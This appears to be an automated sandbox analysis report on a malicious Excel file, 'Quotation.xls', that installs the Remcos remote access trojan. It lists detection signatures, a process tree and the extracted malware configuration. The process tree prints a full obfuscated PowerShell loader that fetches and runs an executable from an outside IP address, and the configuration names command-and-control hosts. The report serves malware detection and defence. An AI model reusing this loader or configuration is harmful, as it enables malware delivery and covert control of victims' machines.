Windows
Analysis Report
Quotation.xls
Overview
General Information
Detection
Remcos
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
.NET source code references suspicious native API functions
AI detected suspicious Excel or Word document
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Searches for Windows Mail specific files
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 1252 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
- mshta.exe (PID: 2040 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
- cmd.exe (PID: 1260 cmdline: "C:\Window s\system32 \cmd.exe" "/c POWeRs hElL - EX Byp ass -n OP -w 1 -c DeV icECREDENt iAldePLoym eNT ; iEx($( iEx('[SYst em.teXT.En CoDInG]'+[ chaR]0x3A+ [cHAR]0X3a +'utf8.get StriNG([Sy STEm.COnvE Rt]'+[cHaR ]58+[CHar] 0X3a+'fROM baSE64StRI ng('+[cHAr ]34+'JHpBW lhKTXJMICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICA9ICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBhZEQ tVHlwRSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLW1FT UJlUmRFZml uSXRJb24gI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICdbR GxsSW1wb3J 0KCJ1ckxtb 24uRGxMIiw gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIEN oYXJTZXQgP SBDaGFyU2V 0LlVuaWNvZ GUpXXB1Ymx pYyBzdGF0a WMgZXh0ZXJ uIEludFB0c iBVUkxEb3d ubG9hZFRvR mlsZShJbnR QdHIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIGdrYSxzd HJpbmcgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEpEYnp heWJLY0osc 3RyaW5nICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBnbSx 1aW50ICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBEdXpsV 3FiV2hYQyx JbnRQdHIgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIFVmK TsnICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtTkFtZSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgInR CIiAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLU5hbUVzc GFjZSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgTXJYZHN vICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA tUGFzc1Roc nU7ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAkekFaWEp Nckw6OlVST ERvd25sb2F kVG9GaWxlK DAsImh0dHA 6Ly8xNzIuM jQ1LjEzNS4 xNTUvVDAyM DdXL2NzcnN zLmV4ZSIsI iRlblY6QVB QREFUQVxpZ 2NjdS5leGU iLDAsMCk7c 3RhUnQtU0x lRXAoMyk7c 1RhcnQgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICIkRW5 2OkFQUERBV EFcaWdjY3U uZXhlIg==' +[chaR]34+ '))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
- powershell.exe (PID: 2196 cmdline: POWeRshElL -EX Bypass -nOP -w 1 -c DeVicEC REDENtiAld ePLoymeNT ; iEx($(iEx( '[SYstem.t eXT.EnCoDI nG]'+[chaR ]0x3A+[cHA R]0X3a+'ut f8.getStri NG([SySTEm .COnvERt]' +[cHaR]58+ [CHar]0X3a +'fROMbaSE 64StRIng(' +[cHAr]34+ 'JHpBWlhKT XJMICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CA9ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBhZEQtVHl wRSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLW1FTUJlU mRFZmluSXR Jb24gICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICdbRGxsS W1wb3J0KCJ 1ckxtb24uR GxMIiwgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIENoYXJ TZXQgPSBDa GFyU2V0LlV uaWNvZGUpX XB1YmxpYyB zdGF0aWMgZ Xh0ZXJuIEl udFB0ciBVU kxEb3dubG9 hZFRvRmlsZ ShJbnRQdHI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIGd rYSxzdHJpb mcgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI EpEYnpheWJ LY0osc3Rya W5nICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBnbSx1aW5 0ICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB EdXpsV3FiV 2hYQyxJbnR QdHIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIFVmKTsnI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtT kFtZSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgInRCIiA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLU5 hbUVzcGFjZ SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgT XJYZHNvICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtUGF zc1RocnU7I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAke kFaWEpNckw 6OlVSTERvd 25sb2FkVG9 GaWxlKDAsI mh0dHA6Ly8 xNzIuMjQ1L jEzNS4xNTU vVDAyMDdXL 2NzcnNzLmV 4ZSIsIiRlb lY6QVBQREF UQVxpZ2Njd S5leGUiLDA sMCk7c3RhU nQtU0xlRXA oMyk7c1Rhc nQgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CIkRW52OkF QUERBVEFca WdjY3UuZXh lIg=='+[ch aR]34+'))' )))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- csc.exe (PID: 3128 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nsccvpb0\nsccvpb0.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
- cvtres.exe (PID: 3136 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES25D9.tmp" "c:\Users\user\AppData\Local\Temp\nsccvpb0\CSC7FE4A73D64AC4B32BC98E072D7992CAF.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- igccu.exe (PID: 3244 cmdline: "C:\Users\user\AppData\Roaming\igccu.exe" MD5: A2DCC2E9DD81E3A5F6440ED7027A86DA)
- ngen.exe (PID: 3340 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" MD5: 04C571D6C0F352ADAC5E61F4EBA2665A)
- csc.exe (PID: 3352 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: F8F36858B9405FBE27377FD7E8FEC2F2)
- wab.exe (PID: 3360 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: EF162817C730DB9355F6C28F2445D206)
- wab.exe (PID: 3368 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: EF162817C730DB9355F6C28F2445D206)
- mshta.exe (PID: 3572 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
- cmd.exe (PID: 3668 cmdline: "C:\Window s\system32 \cmd.exe" "/c POWeRs hElL - EX Byp ass -n OP -w 1 -c DeV icECREDENt iAldePLoym eNT ; iEx($( iEx('[SYst em.teXT.En CoDInG]'+[ chaR]0x3A+ [cHAR]0X3a +'utf8.get StriNG([Sy STEm.COnvE Rt]'+[cHaR ]58+[CHar] 0X3a+'fROM baSE64StRI ng('+[cHAr ]34+'JHpBW lhKTXJMICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICA9ICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBhZEQ tVHlwRSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLW1FT UJlUmRFZml uSXRJb24gI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICdbR GxsSW1wb3J 0KCJ1ckxtb 24uRGxMIiw gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIEN oYXJTZXQgP SBDaGFyU2V 0LlVuaWNvZ GUpXXB1Ymx pYyBzdGF0a WMgZXh0ZXJ uIEludFB0c iBVUkxEb3d ubG9hZFRvR mlsZShJbnR QdHIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIGdrYSxzd HJpbmcgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEpEYnp heWJLY0osc 3RyaW5nICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBnbSx 1aW50ICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBEdXpsV 3FiV2hYQyx JbnRQdHIgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIFVmK TsnICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtTkFtZSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgInR CIiAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLU5hbUVzc GFjZSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgTXJYZHN vICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA tUGFzc1Roc nU7ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAkekFaWEp Nckw6OlVST ERvd25sb2F kVG9GaWxlK DAsImh0dHA 6Ly8xNzIuM jQ1LjEzNS4 xNTUvVDAyM DdXL2NzcnN zLmV4ZSIsI iRlblY6QVB QREFUQVxpZ 2NjdS5leGU iLDAsMCk7c 3RhUnQtU0x lRXAoMyk7c 1RhcnQgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICIkRW5 2OkFQUERBV EFcaWdjY3U uZXhlIg==' +[chaR]34+ '))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
- powershell.exe (PID: 3692 cmdline: POWeRshElL -EX Bypass -nOP -w 1 -c DeVicEC REDENtiAld ePLoymeNT ; iEx($(iEx( '[SYstem.t eXT.EnCoDI nG]'+[chaR ]0x3A+[cHA R]0X3a+'ut f8.getStri NG([SySTEm .COnvERt]' +[cHaR]58+ [CHar]0X3a +'fROMbaSE 64StRIng(' +[cHAr]34+ 'JHpBWlhKT XJMICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CA9ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBhZEQtVHl wRSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLW1FTUJlU mRFZmluSXR Jb24gICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICdbRGxsS W1wb3J0KCJ 1ckxtb24uR GxMIiwgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIENoYXJ TZXQgPSBDa GFyU2V0LlV uaWNvZGUpX XB1YmxpYyB zdGF0aWMgZ Xh0ZXJuIEl udFB0ciBVU kxEb3dubG9 hZFRvRmlsZ ShJbnRQdHI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIGd rYSxzdHJpb mcgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI EpEYnpheWJ LY0osc3Rya W5nICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBnbSx1aW5 0ICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB EdXpsV3FiV 2hYQyxJbnR QdHIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIFVmKTsnI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtT kFtZSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgInRCIiA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLU5 hbUVzcGFjZ SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgT XJYZHNvICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtUGF zc1RocnU7I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAke kFaWEpNckw 6OlVSTERvd 25sb2FkVG9 GaWxlKDAsI mh0dHA6Ly8 xNzIuMjQ1L jEzNS4xNTU vVDAyMDdXL 2NzcnNzLmV 4ZSIsIiRlb lY6QVBQREF UQVxpZ2Njd S5leGUiLDA sMCk7c3RhU nQtU0xlRXA oMyk7c1Rhc nQgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CIkRW52OkF QUERBVEFca WdjY3UuZXh lIg=='+[ch aR]34+'))' )))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
- csc.exe (PID: 3780 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\czjog1ic\czjog1ic.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
- cvtres.exe (PID: 3788 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES85A4.tmp" "c:\Users\user\AppData\Local\Temp\czjog1ic\CSCE6080EA75C65453BAA6F2713EF82B3D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- igccu.exe (PID: 3836 cmdline: "C:\Users\user\AppData\Roaming\igccu.exe" MD5: A2DCC2E9DD81E3A5F6440ED7027A86DA)
- iexplore.exe (PID: 3884 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 8A590F790A98F3D77399BE457E01386A)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | | |
{"Host:Port:Password": "bossnacarpet.com:2556:1vegetachcnc.com:2556:1", "Assigned name": "2556", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "chrome-6W1HCC", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown | |
REMCOS_RAT_variants | unknown | unknown | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown | |
REMCOS_RAT_variants | unknown | unknown | |
INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen | |
System Summary |
---|
Source: | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Michael Haag: |